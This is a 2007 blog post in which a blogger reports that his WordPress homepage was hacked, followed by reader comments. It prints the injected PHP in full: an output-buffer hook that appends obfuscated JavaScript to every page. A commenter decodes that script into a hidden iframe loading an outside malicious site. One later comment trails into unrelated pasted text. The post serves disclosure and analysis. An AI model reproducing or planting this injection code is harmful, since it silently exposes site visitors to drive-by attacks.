Trying to hack the blog?

December 9, 2007 • Blogging by Emanuele Feronato • 13 Comments

During the last 4 hours the homepage of this blog was not accessible.

Someone hacked the index.php page and replaced this code

1
2
3
4
5
6

<?php
 
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
 
?>

with this one

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<?php
ob_start("phpfake");
 
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
<?php
function phpfake($buffer)
{
  $Exp='<script language="javascript">$="%6fp%3d%22%2524%253d%2522dw(d%2563s%2528c%2575,1%2534))%253b%2522;%22;cd%3d%221%2529;%2573t%253dst+S%2574rin%2567.f%2572o%256dCha%2572C%256fde(%2528tmp%25%22;cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n %2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;cc%3d%22ds.l%2565ng%2574%2568;%2569++%2529{t%256dp%253dds%252esli%2563%2565(i,%2569+%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cb%3d%221pe%2528%2564s)%253bst%253d%2574m%2570%253d%2527%2527;for(i%253d0%253b%2569%253c%22;ca%3d%22%2566u%256ecti%256fn %2564cs%2528d%2573%252ce%2573%2529%257bds%253dunes%2563%256%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;st%3d%22%2573%2574%253d%2522$%253ds%2574%253b%2564%2563s%2528%2564a%252bd%2562+%2564%2563%252b%2564%2564%252bd%2565%252c%25310%2529%253bd%2577%2528%2573t%2529%253bs%2574%253d$%253b%2522;%22;dz%3d%22%2566%2575%256ecti%256fn %2564w%2528%2574){c%2561%253d%2527%252564ocu%25256%2564%2565%256et%25252ew%252572i%2574%252565%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t %2525%2536%2563a%25256e%25256%2537u%252561%2567%2565%25253d%25255c%252522ja%2576a%2573c%25257%2532%2569pt%25255c%252522%2525%2533%2565%2527;cc%253d%2527%25253c%25255c%25252fscrip%25257%2534%25253e%2527;eva%256c(un%2565s%2563a%2570e(t%2529)%257d%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;ce%3d%222echa%2572Cod%2565At%25280)^%2528%25270x00%2527+e%2573%2529)%2529;}%257d%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29%7bsc(%27%72f5f%36d%73%27,2%2c7);%65v%61l(%75n%65s%63ape%28d%7a+c%7a%2bop+%73t)+%27dw%28dz%2b%63%7a(%24+s%74))%3b%27)}el%73e{%24%3d%27%27};func%74io%6e %73c(c%6e%6d,v,%65d)%7b%76ar%20%65xd%3dnew %44ate%28);e%78%64.se%74Da%74%65(%65x%64.%67etD%61%74e%28)+%65d);%64%6fcu%6den%74.co%6fki%65%3dcnm+ %27%3d%27 +%65%73ca%70e%28v%29+%27;e%78pir%65%73%3d%27+exd.t%6fG%4dT%53t%72in%67(%29;};";eval(unescape($));document.write($);</script><script language="javascript">$="%6fp%3d%22%2524%253d%2522dw(d%2563s%2528c%2575,1%2534))%253b%2522;%22;cd%3d%221%2529;%2573t%253dst+S%2574rin%2567.f%2572o%256dCha%2572C%256fde(%2528tmp%25%22;cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n %2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;cc%3d%22ds.l%2565ng%2574%2568;%2569++%2529{t%256dp%253dds%252esli%2563%2565(i,%2569+%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cb%3d%221pe%2528%2564s)%253bst%253d%2574m%2570%253d%2527%2527;for(i%253d0%253b%2569%253c%22;ca%3d%22%2566u%256ecti%256fn %2564cs%2528d%2573%252ce%2573%2529%257bds%253dunes%2563%256%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;st%3d%22%2573%2574%253d%2522$%253ds%2574%253b%2564%2563s%2528%2564a%252bd%2562+%2564%2563%252b%2564%2564%252bd%2565%252c%25310%2529%253bd%2577%2528%2573t%2529%253bs%2574%253d$%253b%2522;%22;dz%3d%22%2566%2575%256ecti%256fn %2564w%2528%2574){c%2561%253d%2527%252564ocu%25256%2564%2565%256et%25252ew%252572i%2574%252565%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t %2525%2536%2563a%25256e%25256%2537u%252561%2567%2565%25253d%25255c%252522ja%2576a%2573c%25257%2532%2569pt%25255c%252522%2525%2533%2565%2527;cc%253d%2527%25253c%25255c%25252fscrip%25257%2534%25253e%2527;eva%256c(un%2565s%2563a%2570e(t%2529)%257d%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;ce%3d%222echa%2572Cod%2565At%25280)^%2528%25270x00%2527+e%2573%2529)%2529;}%257d%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29%7bsc(%27%72f5f%36d%73%27,2%2c7);%65v%61l(%75n%65s%63ape%28d%7a+c%7a%2bop+%73t)+%27dw%28dz%2b%63%7a(%24+s%74))%3b%27)}el%73e{%24%3d%27%27};func%74io%6e %73c(c%6e%6d,v,%65d)%7b%76ar%20%65xd%3dnew %44ate%28);e%78%64.se%74Da%74%65(%65x%64.%67etD%61%74e%28)+%65d);%64%6fcu%6den%74.co%6fki%65%3dcnm+ %27%3d%27 +%65%73ca%70e%28v%29+%27;e%78pir%65%73%3d%27+exd.t%6fG%4dT%53t%72in%67(%29;};";eval(unescape($));document.write($);</script>';
  return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>

Any clue about the meaning of this expression? I googled for it but I only had results in german language.

This reminded me to make a complete backup of the blog and the database.

I try to backup the blog every week but sometimes it takes a month before I realize I must backup.

If you have a blog, how often fo you backup it?

Rate this post: 1 Star2 Stars3 Stars4 Stars5 Stars (1 votes, average: 4.00 out of 5)
Loading ... Loading ...
Be my fan on Facebook and follow me on Twitter! Exclusive content for my Facebook fans and Twitter followers

This post has 13 comments

  1. s0d4player

    on December 9, 2007 at 6:07 am

    I was worried when I saw that the homepage of the blog was down. I’m glad to see it back up.

  2. NoN

    on December 9, 2007 at 9:07 am

    Better make sure that the hacker cant strike again! I hate hackers because they just keep screving my life!
    PS. Sorry my bad English

  3. Snuggles

    on December 9, 2007 at 9:38 am

    It seems to be a javascript function intent on hurting your webpages HTML tags. The most often causes for this is an unsafe or unupdated hardware or virus protection on the server on which you host this blog. To fix this problem, regularly backup files and make sure that your hosting it hacker safe. This particular instance affected the entire front page by altering your tags and replacing it with its own code which is what the Java was. This was a minor thing that could happen as a skilled hacker could shutdown your page for weeks and put their homepage up instead of yours.

    ~Snuggles

  4. shiv1411

    on December 9, 2007 at 11:58 am

    There should be a script that u can use to prevent it against all hackers.

  5. Massimo M.

    on December 9, 2007 at 5:36 pm

    i backup my site everyday with the automatic aruba.it function (it costs only 2 euro/year to have the daily backup!!!!)

    i recommend you to do the same ;)

    ciao !

    Massy

  6. Ciaren Coleman

    on December 9, 2007 at 7:05 pm

    to get on your blog I just went on one of your tutorials via my web cookies and then just looked at the new post bit to see if you did anything new.

  7. Mike

    on December 10, 2007 at 1:13 am

    It seems to be an obfuscated javascript function which will be inserted at the bottom of the page.

    The funtction seems to check if a cookie exists:
    >> if (document.cookie.indexOf(‘rf5f6ds’)==-1)

    If it does not exist, it will create that cookie, and then do something else, (which I
    have not de-fuscated yet)…

    Otherwise, it will set the do exactly nothing (or at least, that’s what it looks like)…

    -Mike

  8. Mike

    on December 10, 2007 at 2:43 am

    So… after tracing thru the code, this is what will be placed at the bottom of your page (ie; jest before the closing body tag ”

    Not sure if that is of any use to you… but at least now you know what it’s trying to do (sort of).

    Also, this is the code that would generate the cookie:
    >>sc(‘rf5f6ds’,2,7);
    >>function sc(cnm,v,ed)
    >>{
    >> var exd=new Date();
    >> exd.setDate(exd.getDate()+ed);
    >> document.cookie=cnm+ ‘=’ +escape(v)+’;
    >> expires=’+exd.toGMTString();
    >>};

    So, it sets the cookie with a value of ’2′ and an expiration date of “one week from now”…

    I suppose, this is so it would only send visitors to the (hidden) page once a week…

    -Mike

  9. Mike

    on December 10, 2007 at 2:49 am

    Hmmm, looks like the code I entered got stripped out… I’ll try again:
    <div style=”visibility:hidden”><iframe src=”http://guuatwe.com/ld/grb/” width=100 height=80></iframe></div>

    -Mike

  10. marmph

    on December 10, 2007 at 11:57 pm

    no wonder the site was down…

  11. What to do when your blog has a virus : Emanuele Feronato

    on May 1, 2009 at 10:22 pm

    [...] hackers know my blog since quite a long ago and they even made my blog be marked by Google as a site that may harm your [...]

  12. 10 ways to secure your WordPress blog : Emanuele Feronato

    on October 14, 2009 at 12:42 am

    [...] old readers know, my blog has been hacked several times. You can read about my first hack and what to do when your blog has a virus, but now it’s time to prevent hackers from [...]

  13. Phil

    on August 11, 2010 at 2:59 am

    The same shit just happen to my site mate, I contacted hostgator and they are fixing it…

    The hax0r (lol) also uploaded mailcheck.php and that has more js code in it, and test.php with his adsense code in it… Possible clickjacking?

    [code]
    [/code]

    [code]

    Every Monday Scott Andrews contributes Officers’ Quarters , a column about the ins and outs of guild leadership. Last week, our very own Michael Sacco broke the news that raid lockouts will be extendable after Patch 3.2 . Reading through forum comments about this exciting new feature, I found the varied reactions quite amusing. Hardcore raiders seem to think that Blizzard is catering to casuals with this change. They think you should have…

    [/code]

< >